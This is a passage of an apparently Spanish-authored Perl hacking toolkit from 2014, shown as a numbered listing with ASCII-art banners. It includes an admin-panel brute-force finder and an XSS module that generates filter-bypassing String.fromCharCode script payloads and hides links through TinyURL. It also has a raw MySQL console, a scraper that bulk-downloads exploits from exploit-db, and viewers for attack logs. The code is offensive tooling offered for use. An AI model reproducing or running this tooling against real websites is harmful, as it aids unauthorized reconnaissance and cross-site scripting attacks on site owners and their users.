1462 | ||
1463 | ", "logos", "7", "5" ); | |
1464 | ||
1465 | } | |
1466 | else { | |
1467 | ||
1468 | printear( " | |
1469 | ||
1470 | ||
1471 | ||
1472 | \t\t ¾¾¾¾¾¾¾¾¾¾¾ | |
1473 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1474 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1475 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1476 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1477 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1478 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1479 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1480 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1481 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1482 | \t\t ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾ | |
1483 | \t\t ¾¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾ | |
1484 | \t\t ¾¾¾ ¾¾¾ ¾¾¾ ¾¾¾ | |
1485 | \t\t ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾ | |
1486 | \t\t ¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾ | |
1487 | \t\t ¾¾¾¾¾¾¾¾¾ ¾ ¾¾¾¾¾¾¾¾¾ | |
1488 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1489 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1490 | \t\t ¾ ¾¾¾¾¾¾¾¾¾¾ ¾ | |
1491 | \t\t ¾ ¾ ¾¾¾¾ ¾ ¾ | |
1492 | \t\t ¾ ¾¾ ¾¾ | |
1493 | \t\t ¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾ | |
1494 | \t\t ¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾ | |
1495 | \t\t ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾ | |
1496 | \t\t ¾¾¾¾¾¾¾¾¾¾ ¾¾¾ ¾¾¾¾¾¾¾¾¾ | |
1497 | \t\t ¾¾¾ ¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾¾ | |
1498 | \t\t ¾¾¾¾¾¾ ¾¾¾¾¾¾¾ | |
1499 | \t\t ¾¾¾¾¾¾¾¾¾¾¾¾ | |
1500 | \t\t ¾¾¾¾¾¾¾¾¾ | |
1501 | \t\t ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ | |
1502 | \t\t ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾ | |
1503 | \t\t ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾¾¾ | |
1504 | \t\t ¾¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾¾ | |
1505 | \t\t ¾¾¾¾¾¾ ¾¾¾¾¾¾ | |
1506 | \t\t ¾¾¾¾ ¾¾¾¾ | |
1507 | ||
1508 | ||
1509 | ||
1510 | ||
1511 | ||
1512 | ", "logos", "7", "5" ); | |
1513 | ||
1514 | } | |
1515 | ||
1516 | } | |
1517 | ||
1518 | sub printear { # | |
1519 | my $test; | |
1520 | my $efecto; | |
1521 | my $word = getdatanownownownow(); | |
1522 | ||
1523 | if ( $word =~ /colors=(.*)/ ) { | |
1524 | $test = $1; | |
1525 | } | |
1526 | ||
1527 | if ( $word =~ /efect=(.*)/ ) { | |
1528 | $efecto = $1; | |
1529 | } | |
1530 | ||
1531 | if ( $test eq "y" ) { | |
1532 | if ( $_[1] eq "text" ) { | |
1533 | ||
1534 | if ( $efecto =~ /y/ ) { | |
1535 | texto_raro( "\x03" . $_[2] . $_[0] . "\x030" ); | |
1536 | } | |
1537 | else { | |
1538 | cprint( "\x03" . $_[2] . $_[0] . "\x030" ); | |
1539 | } | |
1540 | } | |
1541 | elsif ( $_[1] eq "logos" ) { | |
1542 | cprint( "\x03" . $_[2] . $_[0] . "\x030" ); | |
1543 | } | |
1544 | elsif ( $_[1] eq "stdin" ) { | |
1545 | if ( $_[3] ne "" ) { | |
1546 | cprint( "\x03" . $_[2] . $_[0] . "\x030" . "\x03" . $_[3] ); | |
1547 | my $op = <stdin>; | |
1548 | chomp $op; | |
1549 | cprint("\x030"); | |
1550 | return $op; | |
1551 | } | |
1552 | } | |
1553 | else { | |
1554 | print "error\n"; | |
1555 | } | |
1556 | } | |
1557 | else { | |
1558 | ||
1559 | # | |
1560 | if ( $_[1] eq "text" ) { | |
1561 | ||
1562 | if ( $efecto =~ /y/ ) { | |
1563 | texto_raro( $_[0] ); | |
1564 | } | |
1565 | else { | |
1566 | print( $_[0] ); | |
1567 | } | |
1568 | } | |
1569 | ||
1570 | elsif ( $_[1] eq "logos" ) { | |
1571 | print( $_[0] ); | |
1572 | } | |
1573 | ||
1574 | elsif ( $_[1] eq "stdin" ) { | |
1575 | if ( $_[3] ne "" ) { | |
1576 | if ( $efecto =~ /y/ ) { | |
1577 | texto_raro( $_[0] ); | |
1578 | } | |
1579 | else { | |
1580 | cprint( $_[0] ); | |
1581 | } | |
1582 | my $op = <stdin>; | |
1583 | chomp $op; | |
1584 | return $op; | |
1585 | } | |
1586 | } | |
1587 | else { | |
1588 | print "error\n"; | |
1589 | } | |
1590 | } | |
1591 | } #Fin de printear | |
1592 | ||
1593 | sub texto_raro { | |
1594 | my @letras = split //, $_[0]; | |
1595 | for (@letras) { | |
1596 | usleep(40_000); | |
1597 | print $_; | |
1598 | } | |
1599 | } | |
1600 | ||
1601 | sub clean { | |
1602 | my $os = $^O; | |
1603 | if ( $os =~ /Win32/ig ) { | |
1604 | system("cls"); | |
1605 | } | |
1606 | else { | |
1607 | system("clear"); | |
1608 | } | |
1609 | } | |
1610 | ||
1611 | sub copyright_menu { | |
1612 | printear( "\n\n\t\t\t(C) Doddy Hackman 2014\n\n", "text", "11", "5" ); | |
1613 | exit(1); | |
1614 | } | |
1615 | ||
1616 | ##Funciones del programa ## | |
1617 | ||
1618 | sub start_panel { | |
1619 | ||
1620 | head_panel(); | |
1621 | my $page = printear( "[+] Page : ", "stdin", "11", "13" ); | |
1622 | ||
1623 | if ( $page eq "exit" ) { | |
1624 | estoydentroporahora(); | |
1625 | } | |
1626 | ||
1627 | my $count = printear( "\n[+] Count : ", "stdin", "11", "13" ); | |
1628 | ||
1629 | if ( $count eq "" ) { | |
1630 | $count = 3; | |
1631 | } | |
1632 | ||
1633 | scan_panel( $page, $count ); | |
1634 | adios(); | |
1635 | ||
1636 | } | |
1637 | ||
1638 | sub scan_panel { | |
1639 | ||
1640 | my $web = $_[0]; | |
1641 | ||
1642 | my ( $scheme, $auth, $path, $query, $frag ) = uri_split($web); | |
1643 | ||
1644 | my $web = $scheme . "://" . $auth; | |
1645 | ||
1646 | my $count = 0; | |
1647 | ||
1648 | printear( "\n[+] Searching .....\n\n", "text", "13", "5" ); | |
1649 | ||
1650 | for my $path (@paneles) { | |
1651 | ||
1652 | if ( $count eq $_[1] ) { | |
1653 | last; | |
1654 | } | |
1655 | ||
1656 | $code = tomados( $web . "/" . $path ); | |
1657 | ||
1658 | if ( $code->is_success ) { | |
1659 | $controlt = 1; | |
1660 | $count++; | |
1661 | printear( | |
1662 | "\a\a[Link] : " . $web . "/" . $path . "\n", "text", | |
1663 | "7", "5" | |
1664 | ); | |
1665 | ||
1666 | savefile( "admin_logs.txt", $web . "/" . $path ); | |
1667 | } | |
1668 | ||
1669 | } | |
1670 | ||
1671 | if ( $controlt ne 1 ) { | |
1672 | printear( "[-] Not found anything\n", "text", "5", "5" ); | |
1673 | } | |
1674 | ||
1675 | } ## | |
1676 | ||
1677 | sub head_panel { | |
1678 | printear( " | |
1679 | ||
1680 | ||
1681 | @ @@@@ @ @ @ @ @ @@@@@ @ @ @ @@@@ | |
1682 | @ @ @ @ @ @ @@ @ @ @ @@ @ @ @ | |
1683 | @ @ @ @ @@ @@ @ @@ @ @ @ @@ @ @ @ | |
1684 | @ @ @ @ @@ @@ @ @ @ @ @ @ @ @ @ @ @ | |
1685 | @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ | |
1686 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
1687 | @@@@@ @ @ @ @ @ @ @ @@ @ @ @ @@ @ @ | |
1688 | @ @ @ @ @ @ @ @ @ @@ @ @ @ @@ @ @ | |
1689 | @ @ @@@@ @ @ @ @ @ @ @ @ @ @@@@ | |
1690 | ||
1691 | ||
1692 | ||
1693 | ", "logos", "7", "5" ); | |
1694 | ||
1695 | } | |
1696 | ||
1697 | sub genlogs { | |
1698 | ||
1699 | my $cantidad = int(@files_gen); | |
1700 | my $control_entrada; | |
1701 | my $control_salida; | |
1702 | my $contenido; | |
1703 | my $nuevo_nombre; | |
1704 | ||
1705 | for my $file (@files_chau_gen) { | |
1706 | unlink( getcwd() . "/logs_html/" . $file ); | |
1707 | } | |
1708 | ||
1709 | for my $contador ( 0 .. $cantidad - 1 ) { | |
1710 | ||
1711 | $control_entrada = $files_gen[$contador]; | |
1712 | $control_salida = $files_chau_gen[$contador]; | |
1713 | ||
1714 | if ( $control_entrada eq "kobra" ) { | |
1715 | ||
1716 | borrar_archivos( getcwd() . "/" . "logs_html/webs/" ); | |
1717 | ||
1718 | opendir my ($listando), getcwd() . "/logs/webs/"; | |
1719 | my @archivos = readdir $listando; | |
1720 | closedir $listando; | |
1721 | ||
1722 | savefil( "logs_html/kobra.html", $comienzo_html ); | |
1723 | ||
1724 | savefil( "logs_html/kobra.html", | |
1725 | "<table border=1><td>Logs</td><tr>" ); | |
1726 | ||
1727 | for my $archivo (@archivos) { | |
1728 | ||
1729 | if ( -f getcwd() . "/logs/webs/" . $archivo ) { | |
1730 | ||
1731 | $nuevo_nombre = $archivo; | |
1732 | $nuevo_nombre =~ s/.txt/.html/ig; | |
1733 | ||
1734 | savefil( "logs_html/kobra.html", | |
1735 | "<td>" | |
1736 | . "<a href='webs/" | |
1737 | . $nuevo_nombre . "'>" | |
1738 | . $archivo . "</a>" | |
1739 | . "</td><tr>" ); | |
1740 | ||
1741 | $contenido = | |
1742 | savewords( getcwd() . "/logs/webs/" . $archivo ); | |
1743 | $contenido =~ s/\n/<br>/ig; | |
1744 | ||
1745 | savefil( "logs_html/webs/" . $nuevo_nombre, | |
1746 | $comienzo_html ); | |
1747 | savefil( "logs_html/webs/" . $nuevo_nombre, "<fieldset>" ); | |
1748 | savefil( "logs_html/webs/" . $nuevo_nombre, $contenido ); | |
1749 | savefil( "logs_html/webs/" . $nuevo_nombre, "</fieldset>" ); | |
1750 | savefil( "logs_html/webs/" . $nuevo_nombre, $final_html ); | |
1751 | ||
1752 | } | |
1753 | } | |
1754 | savefil( "logs_html/kobra.html", "</table>" ); | |
1755 | savefil( "logs_html/kobra.html", $final_html ); | |
1756 | ||
1757 | } | |
1758 | elsif ( $control_entrada eq "csrf" ) { | |
1759 | ||
1760 | borrar_archivos( getcwd() . "/" . "logs_html/csrf/" ); | |
1761 | ||
1762 | opendir my ($listando), getcwd() . "/logs/csrf/"; | |
1763 | my @archivos = readdir $listando; | |
1764 | closedir $listando; | |
1765 | ||
1766 | savefil( "logs_html/csrf.html", $comienzo_html ); | |
1767 | savefil( "logs_html/csrf.html", | |
1768 | "<table border=1><td>Logs</td><tr>" ); | |
1769 | ||
1770 | for my $archivo (@archivos) { | |
1771 | ||
1772 | if ( -f getcwd() . "/logs/csrf/" . $archivo ) { | |
1773 | ||
1774 | #print $archivo."\n"; | |
1775 | ||
1776 | $nuevo_nombre = $archivo; | |
1777 | $nuevo_nombre =~ s/.html/.txt/ig; | |
1778 | ||
1779 | savefil( "logs_html/csrf/" . $nuevo_nombre, | |
1780 | savewords( getcwd() . "/logs/csrf/" . $archivo ) ); | |
1781 | ||
1782 | savefil( "logs_html/csrf.html", | |
1783 | "<td>" | |
1784 | . "<a href='csrf/" | |
1785 | . $nuevo_nombre . "'>" | |
1786 | . $nuevo_nombre . "</a>" | |
1787 | . "</td><tr>" ); | |
1788 | ||
1789 | } | |
1790 | } | |
1791 | ||
1792 | savefil( "logs_html/csrf.html", "</table>" ); | |
1793 | savefil( "logs_html/csrf.html", $final_html ); | |
1794 | ||
1795 | } | |
1796 | elsif ( $control_entrada eq "fsd" ) { | |
1797 | ||
1798 | borrar_archivos( getcwd() . "/" . "logs_html/fsdlogs/" ); | |
1799 | ||
1800 | opendir my ($listando), getcwd() . "/logs/fsdlogs/"; | |
1801 | my @archivos = readdir $listando; | |
1802 | closedir $listando; | |
1803 | ||
1804 | savefil( "logs_html/fsd.html", $comienzo_html ); | |
1805 | savefil( "logs_html/fsd.html", | |
1806 | "<table border=1><td>Logs</td><tr>" ); | |
1807 | ||
1808 | for my $archivo (@archivos) { | |
1809 | ||
1810 | if ( -f getcwd() . "/logs/fsdlogs/" . $archivo ) { | |
1811 | ||
1812 | #print $archivo."\n"; | |
1813 | ||
1814 | $nuevo_nombre = $archivo; | |
1815 | $nuevo_nombre =~ s/.html/.txt/ig; | |
1816 | $nuevo_nombre =~ s/.php/.txt/ig; | |
1817 | ||
1818 | savefil( "logs_html/fsdlogs/" . $nuevo_nombre, | |
1819 | savewords( getcwd() . "/logs/fsdlogs/" . $archivo ) ); | |
1820 | ||
1821 | savefil( "logs_html/fsd.html", | |
1822 | "<td>" | |
1823 | . "<a href='fsdlogs/" | |
1824 | . $nuevo_nombre . "'>" | |
1825 | . $nuevo_nombre . "</a>" | |
1826 | . "</td><tr>" ); | |
1827 | } | |
1828 | } | |
1829 | ||
1830 | } | |
1831 | ||
1832 | elsif ( $control_entrada eq "exploitdb" ) { | |
1833 | ||
1834 | borrar_archivos( getcwd() . "/" . "logs_html/exploitdb/" ); | |
1835 | ||
1836 | opendir my ($listando), getcwd() . "/logs/exploitdb/"; | |
1837 | my @archivos = readdir $listando; | |
1838 | closedir $listando; | |
1839 | ||
1840 | savefil( "logs_html/exploitdb.html", $comienzo_html ); | |
1841 | ||
1842 | for my $archivo (@archivos) { | |
1843 | ||
1844 | my $dircon = getcwd() . "/logs/exploitdb/" . $archivo; | |
1845 | ||
1846 | if ( -d $dircon and $archivo ne "." and $archivo ne ".." ) { | |
1847 | ||
1848 | savefil( "logs_html/exploitdb.html", | |
1849 | "<table border=1><td><b><center>" | |
1850 | . $archivo | |
1851 | . "</center></b></td><tr>" ); | |
1852 | ||
1853 | #print "[+] Dir : ".$dircon."\n"; | |
1854 | ||
1855 | opendir my ($listando), $dircon; | |
1856 | my @archivosmas = readdir $listando; | |
1857 | closedir $listando; | |
1858 | ||
1859 | for my $archi (@archivosmas) { | |
1860 | if ( -f $dircon . "/" . $archi ) { | |
1861 | ||
1862 | ## yeah <td> </td> | |
1863 | savefil( "logs_html/exploitdb.html", | |
1864 | "<td>" | |
1865 | . "<a href='exploitdb/" | |
1866 | . $archi . "'>" | |
1867 | . $archi . "</a>" | |
1868 | . "</td><tr>" ); | |
1869 | ||
1870 | savefil( | |
1871 | "logs_html/exploitdb/" . $archi, | |
1872 | savewords( $dircon . "/" . $archi ) | |
1873 | ); | |
1874 | ||
1875 | #print "[+] File : ".$archi."\n"; | |
1876 | } | |
1877 | } | |
1878 | } | |
1879 | savefil( "logs_html/exploitdb.html", "</table><br>" ); | |
1880 | } | |
1881 | ||
1882 | savefil( "logs_html/exploitdb.html", $final_html ); | |
1883 | } | |
1884 | elsif ( $control_entrada eq "xss-logs.txt" ) { | |
1885 | ||
1886 | $contenido = savewords( "logs/" . $control_entrada ); | |
1887 | savefil( "logs_html/" . $control_salida, $comienzo_html ); | |
1888 | $contenido =~ s/\n/<br>/ig; | |
1889 | $contenido =~ s/<script>/1/ig; | |
1890 | $contenido =~ s/<\/script>/1/ig; | |
1891 | savefil( | |
1892 | "logs_html/" . $control_salida, | |
1893 | "<fieldset>$contenido</fieldset>" | |
1894 | ); | |
1895 | savefil( "logs_html/" . $control_salida, $final_html ); | |
1896 | ||
1897 | } | |
1898 | else { | |
1899 | ||
1900 | $contenido = savewords( "logs/" . $control_entrada ); | |
1901 | savefil( "logs_html/" . $control_salida, $comienzo_html ); | |
1902 | $contenido =~ s/\n/<br>/ig; | |
1903 | savefil( | |
1904 | "logs_html/" . $control_salida, | |
1905 | "<fieldset>$contenido</fieldset>" | |
1906 | ); | |
1907 | savefil( "logs_html/" . $control_salida, $final_html ); | |
1908 | ||
1909 | } | |
1910 | } | |
1911 | ||
1912 | } | |
1913 | ||
1914 | sub head_xss { | |
1915 | printear( " | |
1916 | ||
1917 | ||
1918 | ||
1919 | @ @ @@@ @@@ @@@@@ @@@@ @@@@ @ | |
1920 | @ @ @ @ @ @ @ @ @ @ @ @ | |
1921 | @ @ @ @ @ @ @ @ @ @ | |
1922 | @ @ @ @ @ @ @ @ @ @ | |
1923 | @ @@@ @@@ @ @ @ @ @ @ | |
1924 | @ @ @ @ @ @ @ @ @ @ | |
1925 | @ @ @ @ @ @ @ @ @ @ | |
1926 | @ @ @ @ @ @ @ @ @ @ @ @ | |
1927 | @ @ @@@ @@@ @ @@@@ @@@@ @@@@@ | |
1928 | ||
1929 | ||
1930 | ||
1931 | ", "logos", "7", "5" ); | |
1932 | } | |
1933 | ||
1934 | sub xss_scan { | |
1935 | clean(); | |
1936 | head_xss(); | |
1937 | ||
1938 | printear( " | |
1939 | [++] Options | |
1940 | ||
1941 | [+] 1 : XSS Scan | |
1942 | [+] 2 : Generate ByPass | |
1943 | [+] 3 : Hide URL | |
1944 | [+] 4 : Exit | |
1945 | ||
1946 | ", "text", "13", "5" ); | |
1947 | ||
1948 | my $op = printear( "[+] Option : ", "stdin", "11", "13" ); | |
1949 | ||
1950 | if ( $op eq "1" ) { | |
1951 | ||
1952 | my $target = printear( "\n[+] Page : ", "stdin", "11", "13" ); | |
1953 | ||
1954 | scanxss( $target, "yes" ); | |
1955 | ||
1956 | adios(); | |
1957 | } | |
1958 | elsif ( $op eq "2" ) { | |
1959 | ||
1960 | my $target = printear( "\n[+] String : ", "stdin", "11", "13" ); | |
1961 | ||
1962 | if ( $target ne "" ) { | |
1963 | printear( | |
1964 | "\n[XSS] : <script>var code =String.fromCharCode(" | |
1965 | . encode($target) | |
1966 | . "); document.write(code);</script>\n", | |
1967 | "text", "13", "5" | |
1968 | ); | |
1969 | } | |
1970 | else { | |
1971 | printear( "\n[-] Write the string !\n", "text", "5", "5" ); | |
1972 | } | |
1973 | ||
1974 | adios(); | |
1975 | ||
1976 | } | |
1977 | elsif ( $op eq "3" ) { | |
1978 | ||
1979 | my $nueva = printear( "\n[+] String : ", "stdin", "11", "13" ); | |
1980 | ||
1981 | my $code = toma( "http://tinyurl.com/api-create.php?url=" . $nueva ); | |
1982 | ||
1983 | unless ( $code =~ /Error/ig ) { | |
1984 | printear( "\n[+] Link : " . $code . "\n", "text", "13", "5" ); | |
1985 | } | |
1986 | else { | |
1987 | printear( "\n[+] Error\n", "text", "5", "5" ); | |
1988 | } | |
1989 | adios(); | |
1990 | } | |
1991 | elsif ( $op eq "4" ) { | |
1992 | adios(); | |
1993 | } | |
1994 | else { | |
1995 | adios(); | |
1996 | } | |
1997 | } | |
1998 | ||
1999 | sub head_mysqlman { | |
2000 | printear( " | |
2001 | ||
2002 | ||
2003 | ||
2004 | @ @ @ @ @@@ @@@@ @ | |
2005 | @ @ @ @ @ @ @ @ @ | |
2006 | @@ @@ @ @ @ @ @ @ | |
2007 | @@ @@ @ @ @ @ @ @ | |
2008 | @ @ @ @ @ @@@ @ @ @ | |
2009 | @ @ @ @ @ @ @ @ @ | |
2010 | @ @ @ @ @ @ @ @ @ | |
2011 | @ @ @ @ @ @ @ @@ @ | |
2012 | @ @ @ @@@ @@@@ @@@@@ | |
2013 | @ | |
2014 | ||
2015 | ||
2016 | ||
2017 | ", "logos", "7", "5" ); | |
2018 | } | |
2019 | ||
2020 | sub mysqlman { | |
2021 | ||
2022 | clean(); | |
2023 | head_mysqlman(); | |
2024 | ||
2025 | my $host = printear( "[+] Hostname : ", "stdin", "11", "13" ); | |
2026 | my $user = printear( "\n[+] Username : ", "stdin", "11", "13" ); | |
2027 | my $pass = printear( "\n[+] Password : ", "stdin", "11", "13" ); | |
2028 | ||
2029 | ## | |
2030 | ||
2031 | printear( "\n[+] Connecting to the server\n", "text", "13", "5" ); | |
2032 | ||
2033 | $info = "dbi:mysql::" . $host . ":3306"; | |
2034 | if ( my $enter = DBI->connect( $info, $user, $pass, { PrintError => 0 } ) ) | |
2035 | { | |
2036 | ||
2037 | printear( "\n[+] Enter in the database\n", "text", "13", "5" ); | |
2038 | ||
2039 | while (1) { | |
2040 | ||
2041 | my $ac = printear( "\n[+] Query : ", "stdin", "11", "13" ); | |
2042 | ||
2043 | if ( $ac eq "exit" ) { | |
2044 | $enter->disconnect; | |
2045 | printear( "\n[+] Closing connection\n", "text", "5", "5" ); | |
2046 | adios(); | |
2047 | } | |
2048 | ||
2049 | $re = $enter->prepare($ac); | |
2050 | $re->execute(); | |
2051 | my $total = $re->rows(); | |
2052 | ||
2053 | my @columnas = @{ $re->{NAME} }; | |
2054 | ||
2055 | if ( $total eq "-1" ) { | |
2056 | printear( "\n[-] Query Error\n", "text", "5", "5" ); | |
2057 | next; | |
2058 | } | |
2059 | else { | |
2060 | printear( "\n[+] Result of the query\n", "text", "13", "5" ); | |
2061 | if ( $total eq 0 ) { | |
2062 | printear( "\n[+] Not rows returned\n", "text", "5", "5" ); | |
2063 | } | |
2064 | else { | |
2065 | printear( | |
2066 | "\n[+] Rows returned : " . $total . "\n\n", "text", | |
2067 | "13", "5" | |
2068 | ); | |
2069 | for (@columnas) { | |
2070 | printear( $_ . "\t\t", "text", "7", "5" ); | |
2071 | } | |
2072 | print "\n"; | |
2073 | while ( @row = $re->fetchrow_array ) { | |
2074 | for (@row) { | |
2075 | printear( $_ . "\t\t", "text", "7", "5" ); | |
2076 | } | |
2077 | print "\n"; | |
2078 | } | |
2079 | } | |
2080 | } | |
2081 | } | |
2082 | } | |
2083 | else { | |
2084 | print "\n[-] Error connecting\n"; | |
2085 | } | |
2086 | ||
2087 | ## | |
2088 | ||
2089 | adios(); | |
2090 | ||
2091 | } | |
2092 | ||
2093 | sub head_exploitdb { | |
2094 | printear( " | |
2095 | ||
2096 | ||
2097 | ||
2098 | @@@@@ @ @ @@@@@ @ @@@@ @ @@@@@ @@@@ @@@@ | |
2099 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
2100 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
2101 | @ @ @ @ @ @ @ @ @ @ @ @ @ @ | |
2102 | @@@@ @ @@@@@ @ @ @ @ @ @ @ @@@@ | |
2103 | @ @ @ @ @ @ @ @ @ @ @ @ @ | |
2104 | @ @ @ @ @ @ @ @ @ @ @ @ @ | |
2105 | @ @ @ @ @ @ @ @ @ @ @ @ @ | |
2106 | @@@@@ @ @ @ @@@@@ @@@@ @ @ @@@@ @@@@ | |
2107 | ||
2108 | ||
2109 | ||
2110 | ", "logos", "7", "5" ); | |
2111 | } | |
2112 | ||
2113 | sub exploitdb { | |
2114 | ||
2115 | clean(); | |
2116 | head_exploitdb(); | |
2117 | ||
2118 | my $cosa = printear( "[+] String : ", "stdin", "11", "13" ); | |
2119 | ||
2120 | if ( $cosa eq "" ) { adios(); } | |
2121 | printear( "\n[+] Searching string\n", "text", "13", "5" ); | |
2122 | my %found = buscar($cosa); | |
2123 | $total = int( keys %found ) - 1; | |
2124 | printear( "\n[+] Exploits Found : " . $total . "\n\n", "text", "13", "5" ); | |
2125 | unless ( -d $cosa ) { | |
2126 | mkdir( "logs/exploitdb/" . $cosa, "0777" ); | |
2127 | chmod "logs/exploitdb/" . $cosa, "0777"; | |
2128 | } | |
2129 | for my $da ( keys %found ) { | |
2130 | my $tata = $da; | |
2131 | $tata =~ s/=//ig; | |
2132 | $tata =~ s/\(//ig; | |
2133 | $tata =~ s/\)//ig; | |
2134 | $tata =~ s/\///ig; | |
2135 | $tata =~ s/_//ig; | |
2136 | $tata =~ s/\<//ig; | |
2137 | $tata =~ s/(\s)+$//; | |
2138 | ||
2139 | if ( | |
2140 | download( | |
2141 | $found{$da}, "logs/exploitdb/" . $cosa . "/" . $tata . ".txt" | |
2142 | ) | |
2143 | ) | |
2144 | { | |
2145 | printear( "[Exploit Found] : " . $da . "\n", "text", "7", "5" ); | |
2146 | chmod 0777, "logs/exploitdb/" . $cosa . "/" . $tata . ".txt"; | |
2147 | } | |
2148 | ||
2149 | } | |
2150 | ||
2151 | chmod 0777, "logs/exploitdb/" . $cosa; | |
2152 | ||
2153 | printear( "\n[+] Finished\n", "text", "13", "5" ); | |
2154 | ||
2155 | adios(); | |
2156 | ||
2157 | sub buscar { | |
2158 | for my $n ( 1 .. 666 ) { | |
2159 | my $code = toma( | |
2160 | "http://www.exploit-db.com/search/?action=search&filter_page=" | |
2161 | . $n | |
2162 | . "&filter_description=" | |
2163 | . $_[0] | |
2164 | . "&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=" | |
2165 | ); | |
2166 | chomp $code; | |
2167 | if ( $code =~ /No results/ig ) { | |
2168 | return %busca; | |
2169 | } | |
2170 | %busca = getlinks($code); | |
2171 | } | |
2172 | } | |
2173 | ||
2174 | sub getlinks { | |
2175 | ||
2176 | my $test = HTML::Parser->new( | |
2177 | start_h => [ \&start, "tagname,attr" ], | |
2178 | text_h => [ \&text, "dtext" ], | |
2179 | ); | |
2180 | $test->parse( $_[0] ); | |
2181 | ||
2182 | sub start { | |
2183 | my ( $a, $b ) = @_; | |
2184 | my %e = %$b; | |
2185 | unless ( $a ne "a" ) { | |
2186 | $d = $e{href}; | |
2187 | $c = $a; | |
2188 | } | |
2189 | } | |
2190 | ||
2191 | sub text { | |
2192 | my $title = shift; | |
2193 | chomp $title; | |
2194 | unless ( $c ne "a" ) { | |
2195 | if ( $d =~ /www.exploit-db.com\/exploits\/(.*)/ ) { | |
2196 | my $id = $1; | |
2197 | my $url = "http://www.exploit-db.com/download/" . $id; | |
2198 | $links{$title} = $url; | |
2199 | } | |
2200 | $d = ""; | |
2201 | } | |
2202 | } | |
2203 | return %links; | |
2204 | } | |
2205 | ||
2206 | } | |
2207 | ||
2208 | sub head_encodedecode { | |
2209 | printear( " | |
2210 | ||
2211 | @@@@@ @ @ @@@@ @@@@ @@@@ @@@@@ @@@@@ | |
2212 | @ @@ @ @ @ @ @ @ @ @ @ @ | |
2213 | @ @@ @ @ @ @ @ @ @ @ @ | |
2214 | @ @ @ @ @ @ @ @ @ @ @ @ | |
2215 | @@@@ @ @ @ @ @ @ @ @ @@@@ @@@@@ | |
2216 | @ @ @ @ @ @ @ @ @ @ @ @ | |
2217 | @ @ @@ @ @ @ @ @ @ @ @ | |
2218 | @ @ @@ @ @ @ @ @ @ @ @ @ | |
2219 | @@@@@ @ @ @@@@ @@@@ @@@@ @@@@@ @ @ | |
2220 | ||
2221 | ||
2222 | ", "logos", "7", "5" ); | |
2223 | } | |
2224 | ||
2225 | sub encodedecode { | |
2226 | ||
2227 | clean(); | |
2228 | head_encodedecode(); | |
2229 | ||
2230 | printear( " | |
2231 | [++] Options | |
2232 | ||
2233 | [+] 1 : MD5 encoder | |
2234 | [+] 2 : base64 encoder | |
2235 | [+] 3 : base64 decoder | |
2236 | [+] 4 : ASCII encoder | |
2237 | [+] 5 : ASCII decoder | |
2238 | [+] 6 : HEX encoder | |
2239 | [+] 7 : HEX decoder | |
2240 | [+] 8 : URL encoder | |
2241 | [+] 9 : URL decoder | |
2242 | [+] 10 : Text to BIN | |
2243 | [+] 11 : BIN to Text | |
2244 | [+] 12 : Exit | |
2245 | ||
2246 | ", "text", "13", "5" ); | |
2247 | ||
2248 | my $op = printear( "[+] Option : ", "stdin", "11", "13" ); | |
2249 | ||
2250 | if ( $op eq "1" ) { | |
2251 | ||
2252 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); | |
2253 | printear( "\n[+] Result : " . md5_hex($texto) . "\n", | |
2254 | "text", "13", "5" ); | |
2255 | adios(); | |
2256 | ||
2257 | } | |
2258 | elsif ( $op eq "2" ) { | |
2259 | ||
2260 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); | |
2261 | printear( | |
2262 | "\n[+] Result : " . encode_base64($texto) . "\n", "text", | |
2263 | "13", "5" | |
2264 | ); | |
2265 | adios(); | |
2266 | ||
2267 | } | |
2268 | elsif ( $op eq "3" ) { | |
2269 | ||
2270 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); | |
2271 | printear( | |
2272 | "\n[+] Result : " . decode_base64($texto) . "\n", "text", | |
2273 | "13", "5" | |
2274 | ); | |
2275 | adios(); | |
2276 | ||
2277 | } | |
2278 | if ( $op eq "4" ) { | |
2279 | ||
2280 | my $texto = printear( "\n[+] Text : ", "stdin", "11", "13" ); | |
